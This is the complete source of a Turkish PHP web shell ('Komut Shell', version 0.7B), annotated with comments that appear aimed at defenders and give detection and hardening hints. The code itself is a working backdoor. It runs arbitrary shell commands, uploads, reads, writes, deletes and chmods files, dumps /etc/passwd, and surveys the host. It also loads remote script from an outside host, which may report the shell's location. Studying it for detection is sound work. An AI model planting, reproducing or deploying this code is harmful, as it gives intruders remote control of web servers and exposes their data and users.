
1 <?php ?><?

php
// Setup for a password-gated remote administration script (a PHP web shell):
// starts a session, turns off error reporting and defines the shared secret,
// the version string and the sidebar quick-command table.
2 session_start();
// Disables PHP error reporting for the request, so faults in this script
// produce no notices or warnings.
3 error_reporting(0);
// Hard-coded shared secret. The same literal is printed on the login form at the
// end of the file, so the gate offers no real protection; the literal is a
// usable static signature when scanning web roots.
4 $password = "webr00t"; //Change this to your password ;)
5 $version = "0.7B";
// Button label => JavaScript call, rendered as sidebar buttons. Labels are
// Turkish; the calls cover screen/history clearing, function availability,
// host information, the account file, listening sockets and the process list.
6 $functions = array('Ekrani Temizle' => 'ClearScreen()', 'Gecmisi Temizle' =>
'ClearHistory()', 'Fonksiyon Bilgisi' => "runcommand('canirun','GET')", 'Server
Bilgisi' => "runcommand('showinfo','GET')", '/etc/passwd Oku' =>
"runcommand('etcpasswdfile','GET')", 'Acik Portlar' => "runcommand('netstat -an |
grep -i listen','GET')", 'Calisan Uygulamalar' => "runcommand('ps -aux','GET')",);
// Lower-case name; the markup further down prints $ThisFile with different casing.
7 $thisfile = basename(__FILE__);
// Inline stylesheet for the operator interface (black background, white bold
// Verdana text). Pure presentation, no logic; printed into the page head later.
8 $style = '<style type="text/css">
9 .cmdthing {
10 border-top-width: 0px;
11 font-weight: bold;
12 border-left-width: 0px;
13 font-size: 10px;
14 border-left-color: #000000;
15 background: #000000;
16 border-bottom-width: 0px;
17 border-bottom-color: #FFFFFF;
18 color: #FFFFFF;
19 border-top-color: #008000;
20 font-family: verdana;
21 border-right-width: 0px;
22 border-right-color: #000000;
23 }
24 input,textarea {
25 border-top-width: 1px;
26 font-weight: bold;
27 border-left-width: 1px;
28 font-size: 10px;
29 border-left-color: #FFFFFF;
30 background: #000000;
31 border-bottom-width: 1px;
32 border-bottom-color: #FFFFFF;
33 color: #FFFFFF;
34 border-top-color: #FFFFFF;
35 font-family: verdana;
36 border-right-width: 1px;
37 border-right-color: #FFFFFF;
38 }
39 A:hover {
40 text-decoration: none;
41 }
42
43
44 table,td,div {
45 border-collapse: collapse;
46 border: 1px solid #FFFFFF;
47 }
48 body {
49 color: #FFFFFF;
50 font-family: verdana;
51 }
52 </style>';
// Session key = script path concatenated with the password, so the key itself
// embeds the secret.
53 $sess = __FILE__ . $password;
// Login handler. The POST field p4ssw0rD is compared with the loose == operator
// (PHP type juggling applies, and the comparison is not constant-time), then the
// plaintext password is stored in the session. No throttling of attempts is
// visible in this file. The field name is a stable string to match in captured
// request bodies or WAF rules.
54 if (isset($_POST['p4ssw0rD'])) {
55 if ($_POST['p4ssw0rD'] == $password) {
56 $_SESSION[$sess] = $_POST['p4ssw0rD'];
57 } else {
58 die("Wrong password");
59 }
60 }
// Everything inside this branch runs only when the session holds the password
// (again a loose == comparison).
61 if ($_SESSION[$sess] == $password) {
// Restore the working directory stored in the session, if it still exists.
62 if (isset($_SESSION['workdir'])) {
63 if (file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) {
64 chdir($_SESSION['workdir']);
65 }
66 }
// File upload. The client-supplied name, reduced with basename(), is written
// into the current working directory with no extension, content-type or size
// check, and the result of move_uploaded_file() is ignored. Any file type,
// including further scripts, can therefore land in a served path.
// Detection: multipart POSTs carrying the field uploadedfile to a script that
// is not a known upload endpoint, and new files appearing next to it.
67 if (isset($_FILES['uploadedfile']['name'])) {
68 $target_path = "./";
69 $target_path = $target_path . basename($_FILES['uploadedfile']['name']);
70 if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path))
{
71 }
72 }
// Command dispatcher. The GET parameter runcmd carries one command line per
// request, so each operator action shows up in the web server access log as a
// request to this script with runcmd= in the query string.
73 if (isset($_GET['runcmd'])) {
74 $cmd = $_GET['runcmd'];
// The echoed prompt line is HTML-escaped; most other output below is not.
75 print "<b>" . get_current_user() . "~# </b>" . htmlspecialchars($cmd) .
"<br>";
76 if ($cmd == "") {
77 print "Empty Command..type \"shellhelp\" for some ehh...help";
// upload: only reports whether the current directory is writable.
78 } elseif ($cmd == "upload") {
79 print '<br>Uploading to: ' . realpath(".");
80 if (is_writable(realpath("."))) {
81 print "<br><b>I can write to this directory</b>";
82 } else {
83 print "<br><b><font color=red>I can't write to this directory, please
choose another one.</b></font>";
84 }
// changeworkdir / cd: the path is taken as given and persisted in the session.
// ereg() was removed in PHP 7.0, which dates this sample to PHP 5.x or older.
85 } elseif ((ereg("changeworkdir (.*)", $cmd, $file)) || (ereg("cd (.*)", $cmd,
$file))) {
86 if (file_exists($file[1]) && is_dir($file[1])) {
87 chdir($file[1]);
88 $_SESSION['workdir'] = $file[1];
89 print "Current directory changed to " . $file[1];
90 } else {
91 print "Directory not found";
92 }
// editfile: prints the content of any readable file into a textarea. The file
// content is HTML-escaped; the path placed in the value attribute is not.
93 } elseif (ereg("editfile (.*)", $cmd, $file)) {
94 if (file_exists($file[1]) && !is_dir($file[1])) {
95 print "<form name=\"saveform\"><textarea cols=70 rows=10
id=\"area1\">";
96 $contents = file($file[1]);
97 foreach ($contents as $line) {
98 print htmlspecialchars($line);
99 }
100 print "</textarea><br><input size=80 type=text name=filetosave
value=" . $file[1] . "><input value=\"Save\" type=button
onclick=\"SaveFile();\"></form>";
101 } else {
102 print "File not found.";
103 }
// deletefile: rmdir() or unlink() on an arbitrary path, bounded only by the
// filesystem permissions of the account PHP runs as.
104 } elseif (ereg("deletefile (.*)", $cmd, $file)) {
105 if (is_dir($file[1])) {
106 if (rmdir($file[1])) {
107 print "Directory succesfully deleted.";
108 } else {
109 print "Couldn't delete directory!";
110 }
111 } else {
112 if (unlink($file[1])) {
113 print "File succesfully deleted.";
114 } else {
115 print "Couldn't delete file!";
116 }
117 }
// canirun: environment survey. Reports whether passthru, exec, system and
// shell_exec exist and whether safe_mode and open_basedir are set. Colours are
// from the operator viewpoint: red marks a restriction that is in force.
// Hardening note: these four functions can be blocked with the php.ini
// disable_functions directive, and open_basedir confines the file operations
// used elsewhere in this script.
118 } elseif (strtolower($cmd) == "canirun") {
119 print "<br>";
120 if (function_exists(passthru)) {
121 print "Passthru: <b><font color=green>Enabled</b></font><br>";
122 } else {
123 print "Passthru: <b><font color=red>Disabled</b></font><br>";
124 }
125 if (function_exists(exec)) {
126 print "Exec: <b><font color=green>Enabled</b></font><br>";
127 } else {
128 print "Exec: <b><font color=red>Disabled</b></font><br>";
129 }
130 if (function_exists(system)) {
131 print "System: <b><font color=green>Enabled</b></font><br>";
132 } else {
133 print "System: <b><font color=red>Disabled</b></font><br>";
134 }
135 if (function_exists(shell_exec)) {
136 print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
137 } else {
138 print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
139 }
140 print "<br><br>";
141 if (ini_get('safe_mode')) {
142 print "Safe Mode: <b><font color=red>Enabled</b></font>";
143 } else {
144 print "Safe Mode: <b><font color=green>Disabled</b></font>";
145 }
146 print "<br><br><br>";
147 if (ini_get('open_basedir')) {
148 print "Open_basedir: <b><font color=red>Enabled</b></font>";
149 } else {
150 print "Open_basedir: <b><font color=green>Disabled</b></font>";
151 }
152 }
153 //Directory listing (file browser backend)
// listdir: changes into the requested directory, splits its entries into
// directories and files, and renders each with inline onclick handlers for
// delete [D], set-working-directory [W] and open. Entry names and real paths
// are concatenated into HTML and JavaScript without escaping.
154 elseif (ereg("listdir (.*)", $cmd, $directory)) {
155 if (!file_exists($directory[1])) {
156 die("Directory not found");
157 }
158 //Some variables
159 chdir($directory[1]);
160 $i = 0;
161 $f = 0;
162 $dirs = "";
163 $filez = "";
164 if (!ereg("/$", $directory[1])) //Does it end with a slash?
165 {
166 $directory[1].= "/"; //If not, add one
167
168 }
169 print "Listing directory: " . $directory[1] . "<br>";
170 print "<table
border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
171 if ($handle = opendir($directory[1])) {
// is_dir() is evaluated relative to the directory entered by chdir() above.
172 while (false !== ($file = readdir($handle))) {
173 if (is_dir($file)) {
174 $dirs[$i] = $file;
175 $i++;
176 } else {
177 $filez[$f] = $file;
178 $f++;
179 }
180 }
181 print "<td>";
182 foreach ($dirs as $directory) {
183 print "<i style=\"cursor:crosshair\" onclick=\"deletefile('" .
realpath($directory) . "');\">[D]</i><i style=\"cursor:crosshair\"
onclick=\"runcommand('changeworkdir " . realpath($directory) .
"','GET');\">[W]</i><b style=\"cursor:crosshair\"
onclick=\"runcommand('clear','GET'); runcommand ('listdir " . realpath($directory) .
"','GET'); \">" . $directory . "</b><br>";
184 }
185 print "</td><td>";
186 foreach ($filez as $file) {
187 print "<i style=\"cursor:crosshair\" onclick=\"deletefile('" .
realpath($file) . "');\">[D]</i><u style=\"cursor:crosshair\"
onclick=\"runcommand('editfile " . realpath($file) . "','GET');\">" . $file . "</u><br>";
188 }
189 print "</td></table>";
190 }
// about: author banner. The banner text and the linked host are fixed strings
// and can serve as content signatures for this shell family.
191 } elseif (strtolower($cmd) == "about") {
192 print "Ajax Command Shell by <a
href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
193 }
194 //Show info
// showinfo: host reconnaissance - free and total space of the root filesystem
// (bytes divided by 1000000), the current real path and the output of uname -a
// obtained through passthru().
195 elseif (strtolower($cmd) == "showinfo") {
196 if (function_exists(disk_free_space)) {
197 $free = disk_free_space("/") / 1000000;
198 } else {
199 $free = "N/A";
200 }
201 if (function_exists(disk_total_space)) {
202 $total = trim(disk_total_space("/") / 1000000);
203 } else {
204 $total = "N/A";
205 }
206 $path = realpath(".");
207 print "<b>Free:</b> $free / $total MB<br><b>Current path:</b>
$path<br><b>Uname -a Output:</b><br>";
208 if (function_exists(passthru)) {
209 passthru("uname -a");
210 } else {
211 print "Passthru is disabled :(";
212 }
213 }
214 //Read /etc/passwd
// etcpasswdfile: attempts to read the system account file and prints each line
// without escaping. Because error reporting is off, a failed read is silent.
215 elseif (strtolower($cmd) == "etcpasswdfile") {
216 $pw = file('/etc/passwd/');
217 foreach ($pw as $line) {
218 print $line;
219 }
220 }
221 //Execute any other command
// Fallthrough branch: any command line not matched above is handed to an
// operating-system execution function. The first available one among passthru,
// exec, system and shell_exec is used; passthru, system and shell_exec receive
// the operator-supplied $cmd, while the exec branch as written runs a fixed
// ls -la. Output is printed without HTML escaping.
// Detection: child processes (sh and the commands it launches) spawned by the
// web server or PHP worker. Mitigation: disable_functions in php.ini, and a
// PHP account with no write access to served directories.
222 else {
223 if (function_exists(passthru)) {
224 passthru($cmd);
225 } else {
226 if (function_exists(exec)) {
227 exec("ls -la", $result);
228 foreach ($result as $output) {
229 print $output . "<br>";
230 }
231 } else {
232 if (function_exists(system)) {
233 system($cmd);
234 } else {
235 if (function_exists(shell_exec)) {
236 print shell_exec($cmd);
237 } else {
238 print "Sorry, none of the command functions works.";
239 }
240 }
241 }
242 }
243 }
// savefile: arbitrary file write. The POST fields filetosave (path) and
// filecontent (bytes) are used as given. When the target is not writable the
// script first tries chmod 0777, which leaves the file world-writable
// afterwards. The return values of fopen() and fwrite() are not checked.
// Detection: POSTs with savefile in the query string, unexpected 0777 modes and
// changed modification times under the web root.
244 } elseif (isset($_GET['savefile']) && !empty($_POST['filetosave']) && !
empty($_POST['filecontent'])) {
245 $file = $_POST['filetosave'];
246 if (!is_writable($file)) {
247 if (!chmod($file, 0777)) {
248 die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this
message ^_^
249
250 }
251 }
252 $fh = fopen($file, 'w');
253 $dt = $_POST['filecontent'];
254 fwrite($fh, $dt);
255 fclose($fh);
256 } else {
257 ?>
258 <html>
259 <title>Komut Shell ~ <?php print getenv("HTTP_HOST"); ?> ~ by
WebRooT</title>
260 <meta http-equiv="Content-Type" content="text/html; charset=windows-1254" />
261 <head>
262 <?php print $style; ?>
263 <SCRIPT TYPE="text/javascript">
// sf() focuses the command input (called from the body onload handler).
// outputcmd and cmdhistory accumulate the HTML shown in the output and history panes.
264 function sf(){document.cmdform.command.focus();}
265 var outputcmd = "";
266 var cmdhistory = "";
// Empties the accumulated output buffer and the output pane. Client-side only;
// nothing is sent to the server.
267 function ClearScreen()
268 {
269 outputcmd = "";
270 document.getElementById('output').innerHTML = outputcmd;
271 }
272
// Empties the command history buffer and the history pane. This clears the
// browser view only; server access logs are unaffected.
273 function ClearHistory()
274 {
275 cmdhistory = "";
276 document.getElementById('history').innerHTML = cmdhistory;
277 }
278
// Asks for confirmation, then issues the deletefile command for the given path
// through runcommand() as a GET request.
279 function deletefile(file)
280 {
281 deleteit = window.confirm("Are you sure you want to delete
282 "+file+"?");
283 if(deleteit)
284 {
285 runcommand('deletefile ' + file,'GET');
286 }
287 }
288
// POST helper used by SaveFile(). Creates an XMLHttpRequest (with ActiveX
// fallbacks for old Internet Explorer) and sends a form-encoded body to url.
// No readystatechange handler is attached, so the response is never read and
// the page cannot tell whether the server-side write succeeded.
289 var http_request = false;
290 function makePOSTRequest(url, parameters) {
291 http_request = false;
292 if (window.XMLHttpRequest) {
293 http_request = new XMLHttpRequest();
294 if (http_request.overrideMimeType) {
295 http_request.overrideMimeType('text/html');
296 }
297 } else if (window.ActiveXObject) {
298 try {
299 http_request = new ActiveXObject("Msxml2.XMLHTTP");
300 } catch (e) {
301 try {
302 http_request = new ActiveXObject("Microsoft.XMLHTTP");
303 } catch (e) {}
304 }
305 }
306 if (!http_request) {
307 alert('Cannot create XMLHTTP instance');
308 return false;
309 }
310
311
312 http_request.open('POST', url, true);
313 http_request.setRequestHeader("Content-type", "application/x-www-form-
urlencoded");
314 http_request.setRequestHeader("Content-length", parameters.length);
315 http_request.setRequestHeader("Connection", "close");
316 http_request.send(parameters);
317 }
318
319
// Collects the path and editor content from the saveform fields and POSTs them
// to the script with savefile in the query string. The Saved! message is
// appended unconditionally, before any server response exists.
// Defender view: a POST carrying filetosave and filecontent is the request
// shape of the arbitrary-write feature.
320 function SaveFile()
321 {
322 var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
323 "&filecontent=" +
encodeURI( document.getElementById("area1").value );
324 makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
325 document.getElementById('output').innerHTML =
document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save,
you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it
automaticly.";
326 }
327
// Core client routine. Prepends the command to the history pane, then requests
// the current page with ?runcmd=<command> and appends the response to the output
// pane through innerHTML, so server output is interpreted as markup.
// The contenttosend parameter is never used, and send() is only called when
// action is "GET". Always returns false so the enclosing form does not submit.
// Defender view: every command is a separate GET with runcmd= in the query
// string, which makes the access log the primary record of operator activity.
328 function runcommand(urltoopen,action,contenttosend){
329 cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\"
onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen +
"</i> " + cmdhistory;
330 document.getElementById('history').innerHTML = cmdhistory;
331 if(urltoopen == "clear")
332 {
333 ClearScreen();
334 }
335 var ajaxRequest;
336 try{
337 ajaxRequest = new XMLHttpRequest();
338 } catch (e){
339 try{
340 ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
341 } catch (e) {
342 try{
343 ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
344 } catch (e){
345 alert("Wicked error, nothing we can do about it...");
346 return false;
347 }
348 }
349 }
// readyState 4 = request finished; the whole accumulated buffer is re-wrapped
// in a pre element and the pane is scrolled to the bottom.
350 ajaxRequest.onreadystatechange = function(){
351 if(ajaxRequest.readyState == 4){
352 outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>";
353 document.getElementById('output').innerHTML = outputcmd;
354 var objDiv = document.getElementById("output");
355 objDiv.scrollTop = objDiv.scrollHeight;
356 }
357 }
358 ajaxRequest.open(action, "?runcmd="+urltoopen , true);
359 if(action == "GET")
360 {
361 ajaxRequest.send(null);
362 }
363 document.cmdform.command.value='';
364 return false;
365 }
366
// Replaces the content of the commandtab element with the given HTML string.
367 function set_tab_html(newhtml)
368 {
369 document.getElementById('commandtab').innerHTML = newhtml;
370 }
371
// Switches the lower pane between the five tools (command line, upload form,
// working-directory form, file browser, file creator) by building an HTML
// string and assigning it to the commandtab element. newhtml is an implicit
// global. Several branches also fire a command through runcommand().
372 function set_tab(newtab)
373 {
374 if(newtab == "cmd")
375 {
376 newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return
runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>:
<input type=text name=command class=cmdthing size=100%><br></form>';
377 }
378 else if(newtab == "upload")
379 {
380 runcommand('upload','GET');
381 newhtml = '<font size=0><b>Sayfa Yenilenecek...</b><br><br><form
enctype="multipart/form-data" action="<?php print $ThisFile; ?>"
method="POST"><input type="hidden" name="MAX_FILE_SIZE"
value="10000000" />Dosya se: <input name="uploadedfile" type="file" /><br
/><input type="submit" value="Upload File" /></form></font>';
382 }
383 else if(newtab == "workingdir")
384 {
// The working-directory form is built server-side by the embedded PHP below and
// pasted into a JavaScript string literal; the realpath and dirname values are
// not escaped for HTML or JavaScript.
385 <?php
386 $folders = "<form name=workdir onsubmit=\"return
runcommand(\'changeworkdir \' +
document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text
name=changeworkdir value=\"";
387 $pathparts = explode("/", realpath("."));
388 foreach ($pathparts as $folder) {
389 $folders.= $folder . "/";
390 }
391 $folders.= "\"><input type=submit value=Change></form><br>Script
directory: <i style=\"cursor:crosshair\"
onclick=\"document.workdir.changeworkdir.value=\'" . dirname(__FILE__) . "\'>" .
dirname(__FILE__) . "</i>";
392 ?>
393 newhtml = '<?php print $folders; ?>';
394 }
395 else if(newtab == "filebrowser")
396 {
397 newhtml = '<b>File browser is under construction! Use at your own risk!
</b> <br>You can use it to change your working directory easily, don\'t expect too
much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working
directory.<br><i>[D]</i> = delete file/directory';
398 runcommand('listdir .','GET');
399 }
400 else if(newtab == "createfile")
401 {
402 newhtml = '<b>File Editor, under construction.</b>';
// The editor is pre-filled with a default path: the current directory plus a
// random number between 1000 and 999999 and the extension .txt. This is only a
// suggestion the operator can change, but numeric .txt files appearing in
// served directories are worth checking during triage.
403 document.getElementById('output').innerHTML = "<form
name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input
size=80 type=text name=filetosave value=\"<?php print realpath('.') . "/" . rand(1000,
999999) . ".txt"; ?>\"><input value=\"Save\" type=button
onclick=\"SaveFile();\"></form>";
404
405 }
406 document.getElementById('commandtab').innerHTML = newhtml;
407 }
408 </script>
409 </head>
410 <body bgcolor=black onload="sf();" vlink=white alink=white link=white>
411 <table border=1 width=100% height=100%>
412 <td width=15% valign=top>
413 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
414 <form name="extras"><br>
415 <center><b>Hizli Komutlar</b><br>
416
417 <div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
418 <?php
// Renders one sidebar button per entry of $functions; the label and the onclick
// JavaScript come straight from that table.
// NOTE(review): the page markup around this sidebar loads ciz.js from the
// third-party host r57.gen.tr twice (the SCRIPT SRC tags before and after it).
// Every browser that opens this page therefore contacts that host. What the
// remote script does is not visible here; remote includes in redistributed
// shells are commonly used to report the shell location to the distributor, so
// treat that host as a network indicator - unverified, confirm before relying on it.
419 foreach ($functions as $name => $execute) {
420 print '&nbsp;<input type="button" value="' . $name . '" onclick="' .
$execute . '"><br>';
421 }
422 ?>
423
424 </center>
425
426 </div>
427 </form>
428 <center><b>Komut Gecmisi</b><br></center>
429 <div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width:
100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
430 <br>
431 <center><b>Hakkinda</b><br></center>
432 <div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align:
center;overflow: auto; font-size: 10px;'>
433 <br>
434 <b><font size=3>Komut Shell</b></font><br>by WebRooT
435 <br>
436 Version <?php print $version; ?>
437 </div>
438 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
439 </td>
440 <td width=70%>
441 <table border=0 width=100% height=100%><td id="tabs" height=1%><font
size=0>
442 <b style="cursor:crosshair" onclick="set_tab('cmd');">[Komut alistir]</b>
443 <b style="cursor:crosshair" onclick="set_tab('upload');">[Dosya Upload]</b>
444 <b style="cursor:crosshair" onclick="set_tab('workingdir');">[Dizin Degistir]</b>
445 <b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Dosya
Yoneticisi]</b>
446 <b style="cursor:crosshair" onclick="set_tab('createfile');">[Dosya Olustur]</b>
447
448 </font></td>
449 <tr>
450 <td height=99% width=100% valign=top><div id="output"
style='height:100%;white-space:pre;overflow:auto'></div>
451
452 <tr>
453 <td height=1% width=100% valign=top>
454 <div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
455 &nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return
runcommand(document.cmdform.command.value,'GET');">
456 <b>Komut Satiri</b>: <input type=text name=command class=cmdthing
size=100%><br>
457 </form>
458 </div>
459 </td>
460 </table>
461 </td>
462 </table>
463 </body>
464 </html>
465 <?php
466 }
// Unauthenticated view: a bare login form that posts the field p4ssw0rD back to
// this script. The prompt text discloses the default password in clear, so the
// gate only keeps out visitors who do not read the page. The Turkish prompt and
// the field name are stable strings for content-based detection of this file.
467 } else {
468 print "<center><table border=0 height=100%>
469 <td valign=middle>
470 <form action=" . basename(__FILE__) . " method=POST>Ltfen giris yapiniz.
(sifre=webr00t)<br><b>Password:</b><input type=password
name=p4ssw0rD><input type=submit value=\"Log in\">
471 </form>";
472 }
473 ?>
